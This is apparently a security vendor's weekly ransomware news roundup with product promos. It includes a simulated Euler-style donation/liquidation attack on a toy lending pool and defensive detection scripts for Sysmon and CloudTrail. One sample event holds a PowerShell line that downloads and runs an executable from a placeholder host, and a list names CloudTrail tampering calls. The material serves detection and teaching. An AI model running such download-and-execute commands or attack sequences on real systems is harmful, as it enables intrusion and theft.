Weekly Ransomware Roundup

Mar 13 - 17, 2023

Euler Finance Hack Results in $197 Million Worth of Cryptocurrency Stolen

Euler Finance, a DeFi lending protocol, lost about $197 million in digital assets on March 13 in an attack funded with flash loans: roughly $18.5M in WBTC, $8.75M in DAI, $33.85M in USDC and $135.8M in stETH. The attacker began laundering part of the proceeds through Tornado Cash, a sanctioned mixer. Researchers traced the root cause to Euler's donation and liquidation logic: the donateToReserves function did not run the account health (liquidity) check that the protocol's other balance-changing operations enforce. That let the attacker build a heavily leveraged position with flash-loaned capital, donate part of its collateral to push the same position deliberately underwater, and then liquidate it from a second account at the maximum discount, withdrawing other depositors' funds while the unrecoverable debt stayed behind in the abandoned account.
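The following is a simplified lending-pool model added for this roundup to show the bug class described above: a donation path that skips the account health check lets a single actor make a position underwater on purpose and then liquidate it for profit, and adding the check closes the hole. It is not Euler Finance's code; the accounting is deliberately simplified (one asset, eTokens redeem 1:1 for underlying, a single collateral factor, a capped liquidation discount) and every balance, factor and cap below is a constructed example number, not a figure from the real incident.

```python
"""Simplified lending-pool model: why a donation that skips the health check is
dangerous, and how the check stops it. Added illustration, not Euler's code.
All numbers are constructed; COLLATERAL_FACTOR and MAX_DISCOUNT are assumptions."""
from dataclasses import dataclass, field

COLLATERAL_FACTOR = 0.95  # one unit of collateral backs 0.95 units of debt (assumption)
MAX_DISCOUNT = 0.20       # cap on the liquidation bonus (assumption)
EPS = 1e-9                # float tolerance for the health comparison


@dataclass
class Account:
    collateral: float = 0.0  # eTokens: claims on the pool's underlying
    debt: float = 0.0        # dTokens: what the account owes the pool


@dataclass
class Pool:
    check_health_on_donate: bool  # False reproduces the missing check
    cash: float = 0.0              # real underlying held by the pool
    reserves: float = 0.0
    accounts: dict = field(default_factory=dict)

    def acct(self, name):
        return self.accounts.setdefault(name, Account())

    def health(self, name):
        a = self.acct(name)
        return float("inf") if a.debt == 0 else a.collateral * COLLATERAL_FACTOR / a.debt

    def require_healthy(self, name):
        if self.health(name) < 1.0 - EPS:
            raise ValueError(f"{name}: position would be undercollateralized")

    def deposit(self, name, amount):
        self.cash += amount
        self.acct(name).collateral += amount

    def withdraw(self, name, amount):
        a = self.acct(name)
        if amount > self.cash or amount > a.collateral:
            raise ValueError("insufficient pool cash or balance")
        a.collateral -= amount
        self.cash -= amount
        self.require_healthy(name)

    def mint(self, name, amount):
        # Self-collateralised leverage: equal collateral and debt are created, no cash moves.
        a = self.acct(name)
        a.collateral += amount
        a.debt += amount
        self.require_healthy(name)

    def repay(self, name, amount):
        self.cash += amount
        self.acct(name).debt -= amount

    def donate_to_reserves(self, name, amount):
        a = self.acct(name)
        a.collateral -= amount
        self.reserves += amount
        if self.check_health_on_donate:  # the fix: a donation must not leave the donor underwater
            self.require_healthy(name)

    def liquidate(self, liquidator, violator):
        h = self.health(violator)
        if h >= 1.0:
            raise ValueError("violator is healthy")
        discount = min(1.0 - h, MAX_DISCOUNT)
        v, l = self.acct(violator), self.acct(liquidator)
        # Deeply underwater case: liquidator takes all remaining collateral and assumes only
        # as much debt as that collateral covers at the discounted rate; the rest is bad debt.
        seized = v.collateral
        assumed = seized / (1.0 + discount)
        v.collateral, v.debt = 0.0, v.debt - assumed
        l.collateral += seized
        l.debt += assumed
        self.require_healthy(liquidator)


def run_attack(check_health_on_donate):
    """Return the attacker's net gain in underlying; raises ValueError if the fix blocks it."""
    pool = Pool(check_health_on_donate)
    pool.deposit("depositors", 100.0)              # honest users' funds
    spent = 0.0
    pool.deposit("violator", 20.0); spent += 20.0  # flash-loaned capital
    pool.mint("violator", 200.0)                   # 220 collateral / 200 debt
    pool.repay("violator", 10.0); spent += 10.0    # 220 / 190, makes room for a second mint
    pool.mint("violator", 200.0)                   # 420 / 390, health 1.02
    pool.donate_to_reserves("violator", 110.0)     # 310 / 390, health 0.76: rejected when the check is on
    pool.liquidate("liquidator", "violator")       # liquidator gets 310 collateral for 258.3 debt
    liq = pool.acct("liquidator")
    withdrawable = min(pool.cash, liq.collateral - liq.debt / COLLATERAL_FACTOR)
    pool.withdraw("liquidator", withdrawable)      # paid out of the pool's real cash
    return withdrawable - spent


def fix_blocks_attack():
    """True when the health check in donate_to_reserves stops the sequence."""
    try:
        run_attack(check_health_on_donate=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(f"vulnerable pool: attacker nets {run_attack(False):.2f}; fixed pool blocks it: {fix_blocks_attack()}")
```

With the check disabled the attacker puts in 30 units and withdraws about 38, leaving roughly 132 units of bad debt on the abandoned account; with the check enabled the donation itself is rejected and the sequence never reaches liquidation. The general lesson is that every operation that changes an account's collateral or debt, including "harmless" ones like donating to reserves, must re-run the same solvency invariant.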

CISA Adds Plex Vulnerability to Exploited List Following LastPass Breach

CISA added the Plex Media Server vulnerability CVE-2020-5741 to its Known Exploited Vulnerabilities catalog. The flaw lets an attacker who already holds admin access to a Plex server execute arbitrary Python code remotely. It was fixed in Plex Media Server 1.19.3 in May 2020, but an unpatched server is believed to be how a LastPass DevOps engineer's home computer was compromised in the 2022 LastPass breach. CISA also added CVE-2021-39144, an XStream deserialization flaw in VMware Cloud Foundation that allows unauthenticated remote code execution, and urged organizations to patch both.

LA Housing Authority Affected by Lockbit Ransomware

The Housing Authority of the City of Los Angeles (HACLA) disclosed a LockBit ransomware incident that resulted in a data leak. The attackers had access to HACLA systems from January to December 2022 and took sensitive information including personal identification numbers and financial and medical data. HACLA did not meet the ransom demand, and LockBit threatened to publish all of the stolen files. HACLA advised affected individuals to monitor their accounts, place fraud alerts, and report any identity theft.

BianLian Ransomware Group Switches to Data Theft for Extortion

The BianLian ransomware group has shifted from encrypting victims' files to pure data-theft extortion: it now threatens to leak stolen data rather than holding systems hostage, a change that followed the release of a free decryptor for its encryptor in January 2023. The group still relies on its custom Go-based backdoor for remote access to compromised devices and has listed 118 victim organizations on its leak site, most of them US-based. Its ransom notes stress the legal and regulatory consequences victims face if a breach becomes public, and researchers say the group is refining its extortion by analysing each victim's specific legal exposure.

Guide to Sizing Your Enterprise SAN Appliance for Optimal Storage

Is your enterprise storage optimized for performance and scalability? If not, you could be wasting valuable resources and missing out on potential growth. StoneFly's latest blog offers a comprehensive guide for IT managers and storage administrators on sizing enterprise SAN appliances for optimal storage. Learn how to identify the right storage capacity, calculate IOPS and throughput requirements, and ensure data redundancy and availability. With StoneFly's expert guidance, you can ensure your enterprise storage is meeting your needs and maximizing your investments.

Winter Vivern APT Hackers Use Fake Antivirus Scanners to Install Aperetif Malware

Winter Vivern, a pro-Russian APT group, has been running a cyberespionage campaign against European government organizations and telecommunication providers. It lures victims with web pages that mimic government agencies and serves malicious files from them. The delivery chain uses Windows batch files posing as antivirus scanners that fetch the real payload with PowerShell. The Aperetif payload scans and exfiltrates files automatically, takes screenshots, and sends everything to a hardcoded command-and-control URL.
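The delivery pattern above (a batch file that pretends to be a scanner and hands off to PowerShell to download the payload) is visible in endpoint process telemetry. The detection below is an added example written for this roundup, not code from the campaign or from any vendor report: it scores process-creation events for PowerShell spawned from a batch file with a download cradle, a URL and evasion flags on the command line. The events are constructed in the shape of Sysmon Event ID 1 data; the paths, file names and the address 203.0.113.10 (a documentation range) are placeholders, not indicators from the real campaign.

```python
"""Score Sysmon-style process-creation events for PowerShell download cradles
launched from a batch file. Added example; events below are constructed."""
import re

DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile"
    r"|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
EVASION_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-e(ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{16,}"
    r"|-ep\s+bypass|-executionpolicy\s+bypass", re.I)
URL = re.compile(r"https?://", re.I)
POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.I)
BATCH_PARENT = re.compile(r"\.(bat|cmd)\b", re.I)


def score_event(ev):
    """Return (score, reasons) for one process-creation event; non-PowerShell images score 0."""
    score, reasons = 0, []
    if not POWERSHELL.search(ev["Image"]):
        return 0, reasons
    if ev["ParentImage"].lower().endswith("cmd.exe") and BATCH_PARENT.search(ev["ParentCommandLine"]):
        score += 2; reasons.append("powershell spawned by a batch file")
    cmd = ev["CommandLine"]
    if DOWNLOAD_CRADLE.search(cmd):
        score += 2; reasons.append("download cradle in command line")
    if URL.search(cmd):
        score += 1; reasons.append("URL in command line")
    if EVASION_FLAGS.search(cmd):
        score += 1; reasons.append("hidden window / no profile / encoded or bypass flag")
    return score, reasons


def detect(events, threshold=4):
    """Events at or above the threshold: batch parent plus a cradle, or a cradle with URL and evasion."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"id": ev["id"], "score": score, "reasons": reasons})
    return hits


SAMPLE_EVENTS = [  # constructed, Sysmon Event ID 1 field names
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\jdoe\Downloads\Antivirus_Scanner.bat"'},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'cmd.exe /c "C:\Users\jdoe\Downloads\Antivirus_Scanner.bat"',
     "CommandLine": r'powershell.exe -nop -w hidden -c "iwr http://203.0.113.10/scan.exe -OutFile $env:TEMP\scan.exe; Start-Process $env:TEMP\scan.exe"'},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "CommandLine": 'powershell.exe -Command "Get-Process | Sort-Object CPU"'},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd.exe /c C:\Scripts\nightly_patch.bat",
     "CommandLine": r"powershell.exe -File C:\Scripts\Install-Updates.ps1"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Event 2 (batch parent, `iwr` cradle, URL, `-nop -w hidden`) is the only hit; event 4 shows why the batch-parent signal alone is not enough, since legitimate maintenance scripts launch PowerShell from .bat files all the time. Tune the threshold against your own baseline before alerting on it.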

Promo
192TB Immutable & Air-Gapped Veeam Backup & DR Appliance with 20 Veeam Backup Essential Licenses for $15,995

192TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with 20 Veeam Backup Essential Annual Subscription Licenses for $15,995.

10th Gen, 12-bay 2U Rackmount unit with 12x16TB (192TB) Enterprise SAS drives, 10 Core Storage Virtualization Engine, 32GB System Memory, 512GB NVMe SSD, Redundant Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller, Dual 10Gb RJ-45 Ports, Fully Integrated SAN, NAS and optional S3 cloud storage.

All Enterprise Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.

Weekly Ransomware Roundup

Mar 6 - 10, 2023

Researchers Publish Proof-of-Concept for Critical Microsoft Word Vulnerability

Microsoft Word has a critical vulnerability (CVE-2023-21716, CVSS 9.8) in its RTF parser: a heap corruption bug that allows remote code execution with no user interaction beyond the file being rendered, and rendering it in the Outlook Preview Pane is enough. Microsoft fixed it in the February 2023 Patch Tuesday updates and lists workarounds for systems that cannot be patched yet: read email in plain-text format, and use the Microsoft Office File Block policy to stop Word from opening RTF files from untrusted or unknown sources. A proof-of-concept exploit was published in early March, so patching is now urgent.

Play Ransomware Gang Claims Attack on the City of Oakland and Leaks Data

The City of Oakland was hit by a Play ransomware attack that caused significant disruption to its IT systems, though 911 dispatch, fire emergency services, and core financial systems were not affected. The city declared a local state of emergency and was unable to process online payments for business taxes and parking citations; phone services, payment processing, report processing, and permit and license issuance were all affected. The Play gang has started leaking data it says it stole from the city, including scans of passports and employee information.

Hospital Clínic de Barcelona Systems Severely Impacted by RansomHouse Ransomware

The RansomHouse group hit the Hospital Clínic de Barcelona with ransomware, disrupting emergency services at three affiliated medical centers. The attack struck the hospital's virtualized infrastructure, cutting physicians off from patient information and forcing surgeries to be postponed and appointments cancelled. The hospital says it has taken measures to minimize the impact of the attack.

Phishing Campaign Targets Job Seekers and Employers

Cybercriminals are using job-themed phishing and malware attacks against both job seekers and employers to steal confidential data and get a foothold in company systems. Fake job offers and application portals trick job seekers into handing over personal information or login credentials, or infect their devices with malware. In the other direction, attackers pose as applicants and send employers malware in attachments or links disguised as résumés or identity documents, and use stolen documents such as Social Security numbers and driver's licenses to make the fake applicants look credible.

On-Premise Vs Private Cloud: Choosing the Right Infrastructure for Your Business Needs

Organizations need to choose the right cloud solution for their needs, with on-premise and private cloud being the two most common options. To make an informed decision, it's important to understand their differences. Explore the differences between on-premise and private cloud, including storage, computing, and security.

'Hiatus' Targets Corporate Networks for Cyberespionage

The "Hiatus" campaign targets end-of-life DrayTek Vigor routers (the 2960 and 3900 models), using a malicious bash script to install the HiatusRAT malware and a variant of tcpdump. The implant turns the router into a SOCKS5 proxy and a collection point: the actor can capture email and FTP traffic passing through the device and relay traffic from other compromised machines through the breached router. Around 100 businesses in Europe, North America, and South America have been affected.

Promo
100TB Veeam Backup and Disaster Recovery Appliance Fully Air-Gapped & Immutable

100TB fully air-gapped and immutable Veeam backup and disaster recovery (DR) appliance with object and file lockdown technology for ransomware protection & instant multi-VM recovery.

It is 2U, 8 Bay Rackmount unit with 6x16TB Enterprise SAS drives, 12 core Storage Virtualization Engine, 128GB System Memory, 512GB NVMe SSD, Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller. Fully Integrated SAN, NAS and optional S3 cloud object storage.

Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.

Weekly Ransomware Roundup

Feb 27 - Mar 3, 2023

CISA Alerts of Remote Code Execution Vulnerability in ZK Java Framework

CISA added CVE-2022-36537 to its Known Exploited Vulnerabilities catalog. The flaw affects the ZK Java web framework in versions 8.6.4.1 through 9.6.1 (fixed in 9.6.2 and the corresponding patch releases of the older branches) and lets an attacker send a crafted POST request to the AuUploader component to retrieve files from the web context, exposing sensitive information. It is being exploited through ConnectWise R1Soft Server Backup Manager, which embeds ZK; researchers found backdoors on 286 internet-exposed R1Soft servers. Federal agencies have until March 20, 2023 to apply the updates.

PureCrypter Targets Government Organizations with Ransomware and Information Stealers

PureCrypter, a malware loader, has been used against government organizations in Asia-Pacific and North America to deliver ransomware and information stealers including AgentTesla, RedLine Stealer, Blackmoon, Eternity, and Philadelphia ransomware. The chain starts with an email containing a Discord CDN URL that leads to a password-protected ZIP archive holding the PureCrypter loader. In the observed campaign the AgentTesla payload XOR-encrypts its communication with the C2 server and uses process hollowing to evade detection.

Windows 11 Systems at Risk: BlackLotus UEFI Bootkit Malware Bypasses Secure Boot

BlackLotus is the first UEFI bootkit seen in the wild that bypasses UEFI Secure Boot on fully patched Windows 11 systems. It exploits CVE-2022-21894 ('Baton Drop'), a Secure Boot bypass Microsoft patched in January 2022; because the vulnerable, validly signed Windows boot binaries were never added to the UEFI revocation list (DBX), the bootkit brings its own copies and the exploit still works, so the Baton Drop patch alone is not a defense. Once installed it persists and runs on every boot, disables protections such as BitLocker, HVCI and Microsoft Defender, skips machines whose locale matches several CIS countries (geofencing), loads a kernel driver and a user-mode HTTP downloader, and fetches further payloads from its C2 server.

Advanced Hackers Target Containerized Apps in SCARLETEEL Campaign

The SCARLETEEL campaign starts with a public-facing containerized web application in a Kubernetes cluster on AWS: the attacker exploits the application, steals the IAM role credentials available to the pod, and uses them to make AWS API calls that enumerate the account, steal credentials and data (including Lambda function code and S3 bucket contents) and set up persistence, while deploying the XMRig cryptominer as a distraction. The attacker also attempted to disable CloudTrail logging to cover the activity.
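Two of the behaviours above leave clear traces in CloudTrail: API calls that stop or blind the trail, and new IAM credentials minted with the stolen instance-role session. The triage routine below is an added example written for this roundup, not code from the researchers who reported the campaign. The records are constructed in CloudTrail's JSON shape; the account ID, role name, instance ID and IP addresses are placeholders. It deliberately keeps failed calls (those with an errorCode), because a denied StopLogging is still an attacker telling you what they tried.

```python
"""Triage CloudTrail records for logging tampering and credential persistence,
with a severity boost when the caller is an EC2 instance-role session.
Added example; the records below are constructed."""
import json

LOGGING_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}
CREDENTIAL_PERSISTENCE = {"CreateUser", "CreateAccessKey", "CreateLoginProfile", "AttachUserPolicy"}


def is_workload_credential(record):
    """True when the caller is an assumed role whose session name is an EC2 instance ID,
    i.e. credentials taken from a node's metadata service. IRSA and other session naming
    schemes are not covered here and would need their own rule."""
    identity = record.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return False
    session_name = identity.get("arn", "").rsplit("/", 1)[-1]
    return session_name.startswith("i-")


def triage_record(record):
    """Return an alert dict for a suspicious record, or None for everything else."""
    name, source = record.get("eventName"), record.get("eventSource", "")
    if source == "cloudtrail.amazonaws.com" and name in LOGGING_TAMPER:
        reason = "CloudTrail logging tampering"
    elif source == "iam.amazonaws.com" and name in CREDENTIAL_PERSISTENCE:
        reason = "new IAM credential or privilege grant"
    else:
        return None
    workload = is_workload_credential(record)
    # A denied attempt is still a strong signal: do not filter on errorCode.
    failed = record.get("errorCode")
    return {
        "eventName": name,
        "severity": "high" if workload else "medium",
        "reason": reason
        + (" using instance-role credentials" if workload else "")
        + (f" (attempt failed: {failed})" if failed else ""),
        "sourceIPAddress": record.get("sourceIPAddress"),
    }


def triage_all(raw_json):
    """Parse a CloudTrail log file body ({"Records": [...]}) and return alerts in order."""
    alerts = [triage_record(r) for r in json.loads(raw_json)["Records"]]
    return [a for a in alerts if a]


ROLE_ARN = "arn:aws:sts::123456789012:assumed-role/web-app-node-role/i-0abc123def456789"
SAMPLE_LOG = json.dumps({"Records": [  # constructed records, placeholder identifiers
    {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}, "sourceIPAddress": "198.51.100.7"},
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "DescribeTrails",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}, "sourceIPAddress": "198.51.100.7"},
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}, "sourceIPAddress": "198.51.100.7",
     "errorCode": "AccessDenied"},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}, "sourceIPAddress": "198.51.100.7"},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
     "sourceIPAddress": "203.0.113.5"},
]})

if __name__ == "__main__":
    for alert in triage_all(SAMPLE_LOG):
        print(alert)
```

The read-only reconnaissance calls (GetCallerIdentity, DescribeTrails) are left alone here; they are worth correlating with the high-severity hits from the same source IP, but alerting on them in isolation is noisy. An IAM user creating an access key is flagged at medium severity because it is routine for administrators, whereas an EC2 instance role doing the same thing almost never is.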

2022 Ransomware Attack Trend Report: Key Findings

Ransomware attacks are on the rise due to outdated IT infrastructure, sophisticated techniques, and the pandemic. Many organizations lack sufficient cybersecurity protocols, leading to alarming levels of attacks. Check out the 2022 ransomware statistics and trends in this overview.

Winnti and Clasiopa Hackers Target Materials Sector in Asia with Atharvan and Lilith RAT

Researchers warn that two APT groups are targeting the materials sector in Asia. Winnti, active since 2007, attacked two subsidiaries of a conglomerate using a range of tools. A newly identified group, Clasiopa, broke into an Asian materials research organization, apparently by brute-forcing public-facing servers, and then used post-exploitation tools: the Atharvan backdoor, which downloads files and communicates with a hardcoded C2 server, and a modified Lilith RAT that executes remote commands. Details in Atharvan suggest, with low confidence, that its operators may be based in India.

Promo
80TB Veeam Backup and Disaster Recovery Appliance Fully Air-Gapped & Immutable

80TB Fully Air Gapped and Immutable Veeam Backup and DR appliance with Object Lockdown Technology for Ransomware protection & Instant multi VM recovery.

It is 2U, 8 Bay Rackmount unit with 8x10TB Enterprise SAS drives, 12 Core Storage Virtualization Engine, 128GB System Memory, 512GB NVMe SSD, Hot-Swappable Power Supply, 12Gb SAS Hardware RAID Controller. Fully Integrated SAN, NAS and optional S3 cloud object storage.

Data services such as immutable snapshot, encryption (Hardware), Dedupe (hardware), Replication (Sync, Async), Thin provisioning, HOT/COLD Tiering, Flash Cache (NVMe+SSD), WORM (Immutable policy-based vault), Predictive failure, call home, Real-time performance, report, and notification are available as an option if needed.

For appliance demos, specifications, and quotes contact us.
